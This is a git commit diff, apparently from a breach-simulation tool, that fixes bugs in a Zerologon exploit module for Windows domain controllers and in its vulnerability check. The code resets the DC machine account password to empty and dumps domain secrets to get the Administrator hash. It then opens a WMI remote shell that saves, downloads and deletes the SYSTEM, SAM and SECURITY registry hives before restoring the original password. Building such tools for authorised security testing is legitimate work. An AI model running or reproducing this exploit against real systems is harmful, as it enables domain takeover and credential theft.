Changes from manual testing

This commit is contained in:
Shreya 2021-01-26 23:59:11 +05:30
parent 1cf07eff89
commit b57605b58d
2 changed files with 37 additions and 36 deletions

View File

@ -45,6 +45,7 @@ _new_stdout = None
def _set_stdout_to_in_memory_text_stream(): def _set_stdout_to_in_memory_text_stream():
global _orig_stdout, _new_stdout
# set stdout to in-memory text stream, to capture info that would otherwise be printed # set stdout to in-memory text stream, to capture info that would otherwise be printed
_orig_stdout = sys.stdout _orig_stdout = sys.stdout
_new_stdout = io.StringIO() _new_stdout = io.StringIO()
@ -53,6 +54,7 @@ def _set_stdout_to_in_memory_text_stream():
def _unset_stdout_and_return_captured(): def _unset_stdout_and_return_captured():
# set stdout to original and return captured output # set stdout to original and return captured output
global _orig_stdout, _new_stdout
sys.stdout = _orig_stdout sys.stdout = _orig_stdout
_new_stdout.seek(0) _new_stdout.seek(0)
return _new_stdout.read() return _new_stdout.read()
@ -72,8 +74,8 @@ class ZerologonExploiter(HostExploiter):
'exec_method': 'smbexec', 'exec_method': 'smbexec',
'hashes': None, 'hashes': None,
'history': False, 'history': False,
'is_remote' True, 'is_remote': True,
'just_dc': True, 'just_dc': True, # becomes False in a copy in get_original_pwd_nthash()
'just_dc_ntlm': False, 'just_dc_ntlm': False,
'just_dc_user': None, 'just_dc_user': None,
'k': False, 'k': False,
@ -100,7 +102,7 @@ class ZerologonExploiter(HostExploiter):
self.zerologon_finger = ZerologonFinger() self.zerologon_finger = ZerologonFinger()
def _exploit_host(self): def _exploit_host(self):
DC_IP, DC_NAME, DC_HANDLE = self.zerologon_finger.get_dc_details() DC_IP, DC_NAME, DC_HANDLE = self.zerologon_finger.get_dc_details(self.host)
if self.is_exploitable(): if self.is_exploitable():
LOG.info("Target vulnerable, changing account password to empty string.") LOG.info("Target vulnerable, changing account password to empty string.")
@ -211,9 +213,9 @@ class ZerologonExploiter(HostExploiter):
options['target_ip'] = DC_IP options['target_ip'] = DC_IP
options['dc_ip'] = DC_IP options['dc_ip'] = DC_IP
dumped_secrets = self.get_dumped_secrets(options=options dumped_secrets = self.get_dumped_secrets(options=options,
remote_name=DC_IP, remote_name=DC_IP,
username=DC_NAME) username=f"{DC_NAME}$")
for secret in dumped_secrets: for secret in dumped_secrets:
if 'Administrator' in secret: if 'Administrator' in secret:
hashes = secret.split(':')[2:4] # format of secret - "domain\uid:rid:lmhash:nthash:::" hashes = secret.split(':')[2:4] # format of secret - "domain\uid:rid:lmhash:nthash:::"
@ -227,6 +229,7 @@ class ZerologonExploiter(HostExploiter):
for name in ['system', 'sam', 'security']: for name in ['system', 'sam', 'security']:
options[name] = os.path.join(os.path.expanduser('~'), f'monkey-{name}.save') options[name] = os.path.join(os.path.expanduser('~'), f'monkey-{name}.save')
options['dc_ip'] = DC_IP options['dc_ip'] = DC_IP
options['just_dc'] = False
dumped_secrets = self.get_dumped_secrets(options=options, dumped_secrets = self.get_dumped_secrets(options=options,
remote_name='LOCAL') remote_name='LOCAL')
@ -253,17 +256,17 @@ class ZerologonExploiter(HostExploiter):
_set_stdout_to_in_memory_text_stream() _set_stdout_to_in_memory_text_stream()
# Save HKLM keys on victim. # Save HKLM keys on victim.
shell.onecmd('reg save HKLM\SYSTEM system.save && ' + remote_shell.onecmd('reg save HKLM\\SYSTEM system.save && ' +
'reg save HKLM\SAM sam.save && ' + 'reg save HKLM\\SAM sam.save && ' +
'reg save HKLM\SECURITY security.save') 'reg save HKLM\\SECURITY security.save')
# Get HKLM keys locally (can't run these together because it needs to call do_get()). # Get HKLM keys locally (can't run these together because it needs to call do_get()).
shell.onecmd('get system.save') remote_shell.onecmd('get system.save')
shell.onecmd('get sam.save') remote_shell.onecmd('get sam.save')
shell.onecmd('get security.save') remote_shell.onecmd('get security.save')
# Delete saved keys on victim. # Delete saved keys on victim.
shell.onecmd('del /f system.save sam.save security.save') remote_shell.onecmd('del /f system.save sam.save security.save')
info = _unset_stdout_and_return_captured() info = _unset_stdout_and_return_captured()
LOG.debug(f"Getting victim HKLM keys via remote shell: {info}") LOG.debug(f"Getting victim HKLM keys via remote shell: {info}")
@ -294,7 +297,7 @@ class ZerologonExploiter(HostExploiter):
# It worked! # It worked!
assert server_auth['ErrorCode'] == 0 assert server_auth['ErrorCode'] == 0
server_auth.dump() # server_auth.dump()
session_key = nrpc.ComputeSessionKeyAES(None, b'\x00'*8, server_challenge, session_key = nrpc.ComputeSessionKeyAES(None, b'\x00'*8, server_challenge,
unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0")) unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
@ -312,10 +315,10 @@ class ZerologonExploiter(HostExploiter):
request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request['ComputerName'] = DC_NAME + '\x00' request['ComputerName'] = DC_NAME + '\x00'
request["Authenticator"] = authenticator request["Authenticator"] = authenticator
pwd_data = impacket.crypto.SamEncryptNTLMHash(unhexlify(original_pwd_nthash), sessionKey) pwd_data = impacket.crypto.SamEncryptNTLMHash(unhexlify(original_pwd_nthash), session_key)
request["UasNewPassword"] = pwd_data request["UasNewPassword"] = pwd_data
resp = rpc_con.request(request) resp = rpc_con.request(request)
resp.dump() # resp.dump()
except Exception as e: except Exception as e:
LOG.info(f"Unexpected error: {e}") LOG.info(f"Unexpected error: {e}")
@ -554,32 +557,30 @@ class DumpSecrets:
class Wmiexec: class Wmiexec:
OUTPUT_FILENAME = '__' + str(time.time()) OUTPUT_FILENAME = '__' + str(time.time())
def __init__(self, ip, username, hashes, password='', domain='', share=None, noOutput=False): def __init__(self, ip, username, hashes, password='', domain='', share='ADMIN$'):
self.__ip = ip self.__ip = ip
self.__username = username self.__username = username
self.__password = password self.__password = password
self.__domain = domain self.__domain = domain
self.__lmhash, self.__nthash = hashes.split(':') self.__lmhash, self.__nthash = hashes.split(':')
self.__share = share self.__share = share
self.__noOutput = noOutput
self.shell = None self.shell = None
def run(self): def run(self):
if self.__noOutput is False: smbConnection = SMBConnection(self.__ip, self.__ip)
smbConnection = SMBConnection(self.__ip, self.__ip) smbConnection.login(user=self.__username,
smbConnection.login(user=self.__username, password=self.__password,
password=self.__password, domain=self.__domain,
domain=self.__domain, lmhash=self.__lmhash,
lmhash=self.__lmhash, nthash=self.__nthash)
nthash=self.__nthash)
dcom = DCOMConnection(target=self.__ip, dcom = DCOMConnection(target=self.__ip,
username=self.__username, username=self.__username,
password=self.__password, password=self.__password,
domain=self.__domain, domain=self.__domain,
lmhash=self.__lmhash, lmhash=self.__lmhash,
nthash=self.__nthash, nthash=self.__nthash,
oxidResolver=True) oxidResolver=True)
try: try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
@ -589,7 +590,7 @@ class Wmiexec:
win32Process, _ = iWbemServices.GetObject('Win32_Process') win32Process, _ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(self.__share, win32Process, smbConnection, OUTPUT_FILENAME) self.shell = RemoteShell(self.__share, win32Process, smbConnection, self.OUTPUT_FILENAME)
return self.shell return self.shell
except (Exception, KeyboardInterrupt) as e: except (Exception, KeyboardInterrupt) as e:
@ -612,7 +613,7 @@ class RemoteShell(cmd.Cmd):
self.__win32Process = win32Process self.__win32Process = win32Process
self.__transferClient = smbConnection self.__transferClient = smbConnection
self.__pwd = str('C:\\') self.__pwd = str('C:\\')
self.__noOutput = True self.__noOutput = False
# We don't wanna deal with timeouts from now on. # We don't wanna deal with timeouts from now on.
if self.__transferClient is not None: if self.__transferClient is not None:

View File

@ -22,7 +22,7 @@ class ZerologonFinger(HostFinger):
Checks if the Windows Server is vulnerable to Zerologon. Checks if the Windows Server is vulnerable to Zerologon.
""" """
DC_IP, DC_NAME, DC_HANDLE = self.get_dc_details() DC_IP, DC_NAME, DC_HANDLE = self.get_dc_details(host)
if DC_NAME: # if it is a Windows DC if DC_NAME: # if it is a Windows DC
# Keep authenticating until successful. # Keep authenticating until successful.
@ -55,8 +55,8 @@ class ZerologonFinger(HostFinger):
LOG.info('Error encountered; most likely not a Windows Domain Controller.') LOG.info('Error encountered; most likely not a Windows Domain Controller.')
return False return False
def get_dc_details(self): def get_dc_details(self, host):
DC_IP = self.host.ip_addr DC_IP = host.ip_addr
DC_NAME = self.get_dc_name(DC_IP) DC_NAME = self.get_dc_name(DC_IP)
DC_HANDLE = '\\\\' + DC_NAME DC_HANDLE = '\\\\' + DC_NAME
return DC_IP, DC_NAME, DC_HANDLE return DC_IP, DC_NAME, DC_HANDLE